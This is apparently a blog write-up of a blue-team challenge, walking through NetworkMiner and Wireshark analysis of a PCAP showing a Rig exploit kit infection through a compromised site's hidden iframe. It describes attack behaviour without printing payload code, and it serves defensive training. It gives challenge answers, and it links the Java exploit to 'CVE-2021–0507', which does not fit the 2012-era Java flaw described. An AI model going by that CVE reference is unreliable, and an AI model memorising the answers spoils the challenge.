Rig Exploitation Kit Infection — Malware Traffic Analysis
In this article, I use NetworkMiner and Wireshark to analyze a PCAP file that contains Rig Exploitation Kit infection traffic. The PCAP file belongs to a blue team focused challenge on the CyberDefenders website, titled “Malware Traffic Analysis 1” and was created by Brad Duncan.
Disclaimer
I like to add a brief disclaimer before a writeup to encourage people to attempt the challenge before reading this article, since there will obviously be spoilers in this writeup. I believe you will enjoy the challenge more if you attempt it yourself first and then come back to this writeup if you get stuck or need a hint. So without any further delay, lets get started!
Challenge Questions
1. What is the IP address of the Windows VM that gets infected?
We can start by opening the challenge PCAP file using NetworkMiner. This is a great tool for collecting evidence before performing a deeper investigation using Wireshark.
Looking down through the NetworkMiner hosts tab, we can see a range of internal private IP addresses, including an address for a Windows machine.
Since we cannot see any other Windows machines within the organization’s internal private network, we can assume that this is most likely the Windows VM that was infected but we will need to perform further investigation to confirm this!
2. What is the hostname of the Windows VM that gets infected?
3. What is the MAC address of the infected VM?
To identify the hostname and MAC address for the identified Windows machine, we can expand it’s host details in NetworkMiner.
4. What is the IP address of the compromised web site?
5. What is the FQDN of the compromised website?
We can start by looking at the outgoing sessions for the Windows VM in NetworkMiner.
I can see that there are 30 outgoing sessions from the Windows VM, several of which involve suspicious domains. If we look at the sessions tab in NetworkMiner, we can see the timeline of sessions for the Windows machine.
At this point, I am going to take a deeper look at this network traffic using Wireshark. We can start by filtering for HTTP traffic and the IP address of the first suspicious domain highlighted in red above in Wireshark.
http && ip.addr == 82[.]150[.]140[.]30Next, we can select the first HTTP filtered packet (i.e. packet no. 161) and follow the TCP stream. If we scroll down, we can see that there is a suspicious piece of JavaScript code at the bottom of the website.
It appears that if the web page is loaded, then a function called “showBrowVer()” is executed. This function then embeds a hidden iframe which contains one of the suspicious domains inside a DIV tag called “dt” on the website. Finally, if we check both suspicious domains seen in the JavaScript code on VirusTotal, we can see that they are flagged as malicious.
Based on the timeline of outgoing sessions to suspicious domains seen earlier, we can see that once the Windows VM visits the first suspicious domain highlighted in red, additional outgoing sessions occur to the other two malicious URL’s seen in the piece of suspicious JavaScript.
6. What is the IP address of the server that delivered the exploit kit and malware?
7. What is the FQDN that delivered the exploit kit and malware?
8. What is the redirect URL that points to the exploit kit (EK) landing page?
If we continue to follow the TCP stream from earlier, we can see in TCP packet number 981, that once the Windows VM visits the compromised website, it is redirected to the first malicious URL based on the Request Headers below.
Continuing to follow the TCP stream, we are then redirected to another site by the malicious URL seen above.
In NetworkMiner under the files tab, we can see multiple files being downloaded from the FQDN seen above.
If we upload these files to VirusTotal, we can see that there are three flagged as malicious.
Based on this information, we can see that the IP address of the server that delivered the exploit kit and malware, is that of the FQDN seen below.
We can also use VirusTotal and the information gathered so far to confirm the exploit kit used, by uploading the PCAP file and reviewing what snort/suricata alerts are triggered.
VirusTotal shows that Rig EK has been identified as the exploit kit that was used.
9. Other than CVE-2013–2551 IE exploit, another application was targeted by the EK and starts with “J”. Provide the full application name.
Of the three malicious files identified, we can see that one is a malicious Jar file. Based on the output from VirustTotal, we can see that this malicious Jar file is related to CVE-2021–0507. According to the CVE description, it is an unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 2 and earlier, 6 Update 30 and earlier, and 5.0 Update 33 and earlier.
10. How many times was the payload delivered?
We can see that three malicious files were delivered to the infected windows VM.
12. The compromised website has a malicious script with a URL. What is this URL?
As seen previously when analyzing the JavaScript code and answering question 8 earlier, the malicious URL can be identified below:
13. Extract the two exploit files. What are the MD5 file hashes? (comma-separated )
We can get the MD5 Hashes of both exploit files by using NetworkMiner and viewing their properties:
Closing Remarks
I found this challenge was great for practicing with NetworkMiner and Wireshark. I also really enjoyed working through this PCAP challenge file and understanding how the Rig exploitation kit infected the Windows VM. Thank you for reading till the end and keep hacking 😄!
